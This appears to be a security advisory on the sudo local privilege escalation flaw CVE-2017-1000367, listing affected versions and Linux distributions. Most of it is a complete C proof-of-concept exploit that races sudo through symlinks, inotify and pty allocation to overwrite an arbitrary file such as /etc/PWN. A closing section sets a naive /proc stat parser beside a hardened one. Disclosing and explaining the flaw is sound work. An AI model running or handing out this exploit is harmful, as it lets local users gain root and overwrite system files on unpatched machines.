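On May 30, 2017, security researchers outside China disclosed a local privilege escalation vulnerability in sudo on Linux, tracked as CVE-2017-1000367. The vulnerability affects almost all Linux systems.
Details are as follows:
Vulnerability ID:
CVE-2017-1000367
Vulnerability name:
Sudo local privilege escalation vulnerability
Official rating:
High
Description:
When determining the tty, sudo does not correctly parse the contents of /proc/[pid]/stat. A local attacker may use this to overwrite any file on the filesystem, thereby bypassing intended permissions or obtaining a root shell.
Exploitation conditions and method:
Local exploitation
Affected scope:
Sudo 1.8.6p7 through 1.8.20
Red Hat Enterprise Linux 6 (sudo)
Red Hat Enterprise Linux 7 (sudo)
Red Hat Enterprise Linux Server (v. 5 ELS) (sudo)
Debian wheezy
Debian jessie
Debian stretch
Debian sid
Ubuntu 17.04
Ubuntu 16.10
Ubuntu 16.04 LTS
Ubuntu 14.04 LTS
SUSE Linux Enterprise Software Development Kit 12-SP2
SUSE Linux Enterprise Server for Raspberry Pi 12-SP2
SUSE Linux Enterprise Server 12-SP2
SUSE Linux Enterprise Desktop 12-SP2
OpenSuse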
```c
#include <errno.h>
#include <linux/sched.h>
#include <pty.h>
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/inotify.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#define EVENT_SIZE ( sizeof (struct inotify_event) )
#define EVENT_BUF_LEN ( 1024 * ( EVENT_SIZE + 16 ) )
int main( )
{
    int length, i = 0;
    int fd;
    int wd;
    char buffer[EVENT_BUF_LEN];
    int master, slave;
    char pts_path[256];
    struct sched_param params;
    params.sched_priority = 0;
    mkdir("/dev/shm/_tmp", 755);
    symlink(pts_path, "/dev/shm/_tmp/_tty");
    symlink("/usr/bin/sudo", "/dev/shm/_tmp/ 34873 ");
    fd = inotify_init();
    wd = inotify_add_watch( fd, "/dev/shm/_tmp", IN_OPEN | IN_CLOSE_NOWRITE );
    pid_t pid = fork();
    setpriority(PRIO_PROCESS, pid, 19);
    sched_setscheduler(pid, SCHED_IDLE, &params);

    if(pid == 0) {
        execlp("/dev/shm/_tmp/ 34873 ", "sudo", "--\nHELLO\nWORLD\n", NULL);
    }else{
        length = read( fd, buffer, EVENT_BUF_LEN );
        while ( i < length ) {
            struct inotify_event *event = ( struct inotify_event * ) &buffer[ i ];
            if ( event->len ) {
                if ( event->mask & IN_OPEN ) {
                    kill(pid, SIGSTOP);
                    inotify_rm_watch( fd, wd );
                    close( fd );
                    while(strcmp(pts_path,"/dev/pts/57")){
                        openpty(&master, &slave, &pts_path[0], NULL, NULL);
                    };
                    kill(pid, SIGCONT);
                }else if ( event->mask & IN_CLOSE_NOWRITE ) {
                    kill(pid, SIGSTOP);
                    inotify_rm_watch( fd, wd );
                    close( fd );
                    unlink("/dev/shm/_tmp/_tty");
                    symlink("/etc/PWN", "/dev/shm/_tmp/_tty");
                    kill(pid, SIGCONT);
                    break;
                }
            }
            i += EVENT_SIZE + event->len;
        }
    }
    unlink("/dev/shm/_tmp/_tty");
    unlink("/dev/shm/_tmp/ 34873 ");
    rmdir("/dev/shm/_tmp");
    close(master);
    close(slave);
}
```
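The parsing flaw named in the vulnerability description, shown as an added example (not code from the original page or from sudo): a simplified space-splitting reader of /proc/[pid]/stat beside a hardened one that skips the comm field by locating the last ')', following the field order documented in proc(5). The sample line and all function names are constructed for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed sample (not captured output): a /proc/[pid]/stat line whose
 * comm field (field 2, in parentheses) contains spaces and a number.
 * The kernel-reported tty_nr (field 7) is 34816. */
static const char SAMPLE_STAT[] =
    "4321 (a b c d e 999) S 1 4321 4321 34816 4321 4194304 100 0 0 0";

/* Walk space-separated fields starting at p; `seen` fields already precede
 * p. Returns the numeric value of field `want`, or -1 if absent/non-numeric. */
static long field_value(const char *p, int seen, int want)
{
    while (*p != '\0') {
        while (*p == ' ') p++;
        if (*p == '\0') break;
        if (++seen == want) {
            char *end;
            long v = strtol(p, &end, 10);
            return (end != p) ? v : -1;
        }
        while (*p != '\0' && *p != ' ') p++;
    }
    return -1;
}

/* Weak: treats every space as a field separator, so spaces inside comm
 * shift the count and text from the process name is read as tty_nr. */
long tty_nr_naive(const char *stat)
{
    return field_value(stat, 0, 7);
}

/* Hardened: comm ends at the LAST ')'; count from field 3 after it. */
long tty_nr_robust(const char *stat)
{
    const char *rp = strrchr(stat, ')');
    return rp ? field_value(rp + 1, 2, 7) : -1;
}

int main(void)
{
    printf("naive:  %ld\n", tty_nr_naive(SAMPLE_STAT));
    printf("robust: %ld\n", tty_nr_robust(SAMPLE_STAT));
    return 0;
}
```

On the sample line the naive reader returns a number taken from the process name, while the hardened reader returns the tty_nr the kernel reported.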